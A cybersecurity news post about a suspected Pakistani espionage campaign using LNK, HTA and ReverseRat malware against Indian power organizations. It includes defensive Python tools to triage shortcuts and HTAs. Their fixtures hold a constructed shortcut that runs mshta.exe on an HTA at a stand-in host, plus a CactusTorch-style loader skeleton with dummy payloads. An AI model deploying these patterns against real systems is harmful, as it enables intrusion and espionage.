Saturday, July 24, 2021

Suspected Pakistani hackers targeting Indian power companies with ReverseRat


According to new research, a threat actor suspected of having links to Pakistan is targeting government and energy organizations in South and Central Asia in order to deploy a remote-access Trojan on compromised Windows systems.

“Most of the organizations showing signs of compromise were in India, and a very small number were in Afghanistan,” Lumen's Black Lotus Labs said in a blog post on Tuesday.

The victims include a foreign government organization, a power transmission organization, and a power generation organization. The covert operation is said to have been active since at least January 2021.

The intrusions are notable for several reasons, not least because, in addition to their highly targeted nature, the tactics, techniques, and procedures (TTPs) adopted by the adversary rely on repurposed open-source code and on compromised domains in the same country as the targeted entity to host the malicious files.

At the same time, the group has carefully hidden its activity by modifying registry keys, which also gives it the ability to maintain persistence on the device.

Describing the multi-stage infection chain, Lumen noted that the campaign resulted in the victim downloading two agents: one resides in memory, while the second is side-loaded, granting the threat actor persistence on the infected workstations.

The attack begins with a malicious link sent via phishing emails which, when clicked, downloads a ZIP file containing a Microsoft shortcut file (.lnk) and a decoy PDF from a compromised domain.

In addition to opening the decoy document so that the recipient sees something plausible, the shortcut file also stealthily fetches and runs an HTA (HTML application) file from the same compromised website.
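The shortcut is the pivot point of the chain described above, so a triage tool needs to answer one question about every .lnk pulled out of such a ZIP: what command does it actually run? The following is an added example, not code from the page or from Lumen's report. It parses the MS-SHLLINK header and StringData sections of a shortcut, reconstructs the target and arguments, and flags shortcuts that launch a script host against a remote URL or an HTA. The two shortcuts it checks are constructed by the `build_lnk` helper in the block; the use of mshta.exe, the hostname and the URL path in the dropper sample are assumptions for illustration, since the page only says that the shortcut fetches and runs an HTA from the compromised site.

```python
"""Triage a Windows shortcut (.lnk) by parsing its MS-SHLLINK structure and pulling out
the target path and command-line arguments, then flagging shortcuts that launch a script
host such as mshta.exe against a remote URL. Added example, not code from the page or
from Lumen; the sample shortcuts are constructed here (build_lnk) and are not real samples."""
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HEADER_SIZE = 0x4C

# LinkFlags bits from the MS-SHLLINK specification
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData sections appear in this fixed order when their flag is set
STRING_SECTIONS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Script hosts and other LOLBins a document-looking shortcut has no business launching
SCRIPT_HOSTS = ("mshta", "powershell", "wscript", "cscript", "cmd.exe",
                "rundll32", "regsvr32", "certutil")


def build_lnk(relative_path, arguments="", description=""):
    """Serialize a minimal .lnk (header + StringData only); used to construct samples."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH
    if arguments:
        flags |= HAS_ARGUMENTS
    if description:
        flags |= HAS_NAME
    # HeaderSize, LinkCLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize,
    # IconIndex, ShowCommand (SW_SHOWNORMAL), HotKey, Reserved1..3
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    values = {"name": description, "relative_path": relative_path, "arguments": arguments}
    body = b""
    for flag, name in STRING_SECTIONS:
        if flags & flag:
            body += struct.pack("<H", len(values[name])) + values[name].encode("utf-16-le")
    return header + body


def parse_lnk(data):
    """Return the StringData fields of a .lnk as a dict; raises ValueError if not a Shell Link."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a Shell Link: bad HeaderSize")
    if uuid.UUID(bytes_le=bytes(data[4:20])) != LNK_CLSID:
        raise ValueError("not a Shell Link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (u16) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (u32) covers the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_SECTIONS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def triage_lnk(data):
    """Reconstruct the command the shortcut runs and list why it looks like a dropper."""
    fields = parse_lnk(data)
    command = " ".join(v for v in (fields.get("relative_path", ""), fields.get("arguments", "")) if v)
    low = command.lower()
    reasons = []
    if any(h in low for h in SCRIPT_HOSTS):
        reasons.append("launches a script host / LOLBin")
    if "http://" in low or "https://" in low:
        reasons.append("remote URL on the command line")
    if ".hta" in low:
        reasons.append("references an HTA file")
    return {"command": command, "description": fields.get("name", ""),
            "reasons": reasons, "suspicious": bool(reasons)}


# Constructed samples. The dropper mimics the chain described above: a shortcut whose
# description looks like a document but whose target is mshta.exe pointed at an HTA on a
# compromised site (the use of mshta.exe, the hostname and the path are assumptions).
DROPPER_LNK = build_lnk(r"..\..\..\Windows\System32\mshta.exe",
                        "http://compromised-site.example/cowin/register.hta",
                        "CoWIN-Registration-Guide.pdf")
BENIGN_LNK = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "", "Notepad++")

if __name__ == "__main__":
    for label, blob in (("dropper", DROPPER_LNK), ("benign", BENIGN_LNK)):
        print(label, triage_lnk(blob))
```

The parser deliberately skips the LinkTargetIDList and LinkInfo blocks rather than decoding them, because the command line an analyst needs lives in the StringData sections that follow; a real sample will usually carry both blocks, and the size prefixes make skipping them safe. Shortcuts that reach a script host through an environment variable or a relative path, as the dropper sample does, are a reason to match on the binary name rather than on an absolute path.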

The lure documents largely describe events relevant to India, posing as a user manual for registering and booking a COVID-19 vaccine appointment through the CoWIN online portal, while a few others masquerade as material from the Bombay Sappers, a regiment of the Corps of Engineers of the Indian Army.

Regardless of which decoy document is displayed to the victim, the HTA file, which is itself JavaScript code based on a GitHub project called CactusTorch, injects 32-bit shellcode into a running process in order to install a .NET backdoor called ReverseRat. ReverseRat is a typical espionage agent, with the ability to capture screenshots, execute processes and arbitrary executables, perform file operations, and upload the collected data to a remote server.
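CactusTorch wraps its shellcode runner in the DotNetToJScript technique: a serialized .NET object is embedded as base64 in the script, deserialized through BinaryFormatter, and used to instantiate a class that injects the shellcode into the host process named by a `binary` variable. That gives a defender something concrete to look for in an HTA before it ever reaches mshta.exe. The following is an added example, not code from the page or from the CactusTorch project. It scans an HTA for the loader's markers, decodes every long base64 run and keeps the ones that carry a .NET BinaryFormatter stream header, and pulls out the host process and shellcode length. The sample HTA is constructed inside the block with a dummy serialized object and NOPs in place of shellcode; the `entry_class` value and the `o.run(...)` call are illustrative.

```python
"""Static check for the DotNetToJScript loader pattern that CactusTorch reuses inside an
HTA: a base64 .NET BinaryFormatter stream handed to Deserialize_2, plus the CactusTorch
'binary' (host process) and 'code' (shellcode) variables. Added example, not code from the
page or from the CactusTorch project; the HTA below is constructed, with a dummy serialized
object and NOP "shellcode" rather than a working payload."""
import base64
import re

# SerializationHeaderRecord of a .NET BinaryFormatter (NRBF) stream:
# RecordType 0x00, RootId=1, HeaderId=-1, MajorVersion=1, MinorVersion=0
# (base64 of these bytes is the well-known "AAEAAAD/////" prefix)
NRBF_HEADER = (b"\x00" + b"\x01\x00\x00\x00" + b"\xff\xff\xff\xff"
               + b"\x01\x00\x00\x00" + b"\x00\x00\x00\x00")

MARKERS = {
    "hta_host": "HTA:APPLICATION",
    "memorystream": "System.IO.MemoryStream",
    "binaryformatter": "System.Runtime.Serialization.Formatters.Binary.BinaryFormatter",
    "deserialize": "Deserialize_2",
    "dynamicinvoke": "DynamicInvoke",
}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
HOST_VAR = re.compile(r"""var\s+binary\s*=\s*["']([^"']+)["']""")
CODE_VAR = re.compile(r"""var\s+code\s*=\s*["']([A-Za-z0-9+/=]+)["']""")


def is_nrbf(raw):
    """Structural check: record type 0 and version 1.0 at offset 9 (RootId/HeaderId may vary)."""
    return len(raw) >= 17 and raw[0] == 0 and raw[9:17] == b"\x01\x00\x00\x00\x00\x00\x00\x00"


def find_serialized_objects(text):
    """Decode every long base64 run and keep the ones that are BinaryFormatter streams."""
    hits = []
    for m in B64_RUN.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:          # binascii.Error is a subclass of ValueError
            continue
        if is_nrbf(raw):
            hits.append(raw)
    return hits


def scan_hta(text):
    """Return the loader markers present, serialized objects found, host process and shellcode size."""
    found = [k for k, needle in MARKERS.items() if needle in text]
    objects = find_serialized_objects(text)
    host = HOST_VAR.search(text)
    code = CODE_VAR.search(text)
    shellcode = base64.b64decode(code.group(1)) if code else b""
    loader = "binaryformatter" in found and "deserialize" in found and bool(objects)
    if loader:
        verdict = "dotnettojscript-loader"
    elif len(found) >= 3:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "markers": found, "serialized_objects": len(objects),
            "host_process": host.group(1) if host else None, "shellcode_bytes": len(shellcode)}


# Constructed sample HTA following the CactusTorch/DotNetToJScript layout. The serialized
# object is a valid NRBF header plus padding, not a real gadget; the shellcode is NOPs;
# the entry class name and the run() call are illustrative, not the project's own.
_FAKE_OBJECT = NRBF_HEADER + b"\x0c" + b"\x00" * 80
_FAKE_SHELLCODE = b"\x90" * 48
SAMPLE_HTA = """<html><head><HTA:APPLICATION id="x" windowstate="minimize" showintaskbar="no" />
<script language="JScript">
var binary = "__HOST__";
var code = "__CODE__";
var serialized_obj = "__OBJ__";
var entry_class = "ShellcodeLoader";
try {
  var stm = new ActiveXObject("System.IO.MemoryStream");
  var fmt = new ActiveXObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter");
  var al = new ActiveXObject("System.Collections.ArrayList");
  var d = fmt.Deserialize_2(stm);
  al.Add(undefined);
  var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
  o.run(binary, code);
} catch (e) {}
</script></head><body></body></html>
""".replace("__HOST__", "rundll32.exe") \
   .replace("__CODE__", base64.b64encode(_FAKE_SHELLCODE).decode()) \
   .replace("__OBJ__", base64.b64encode(_FAKE_OBJECT).decode())

BENIGN_HTA = '<html><head><HTA:APPLICATION id="app" /><script>alert("hello")</script></head></html>'

if __name__ == "__main__":
    print(scan_hta(SAMPLE_HTA))
    print(scan_hta(BENIGN_HTA))
```

Matching on the decoded stream header rather than on the literal `AAEAAAD/////` string is deliberate: attackers change RootId or HeaderId, split the base64 across string concatenations, or reverse it, and a structural check survives the first of those while the other two call for normalizing the script before scanning. An HTA that legitimately names BinaryFormatter and Deserialize_2 is rare enough that the verdict is worth an analyst's time even without a recovered shellcode blob.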

The custom-developed framework also comes with a third component, in which a second HTA file is downloaded from the same domain to deploy the open-source AllaKore remote agent, likely as an alternative means of maintaining access to the compromised network.

“While this threat actor’s targets have thus far remained within the South and Central Asian regions, they have proven effective at gaining access to networks of interest,” the researchers said. “Despite previously relying upon open-source frameworks such as AllaKore, the actor was able to remain effective and expand its capabilities with the development of the Svchostt agent and other components of the ReverseRat project.”

Priyanshu Vijayvargiya
Founder and Editor-in-Chief of 'Virtualattacks Inc', Priyanshu Vijayvargiya is a cybersecurity analyst, information security professional, developer, and white-hat hacker.

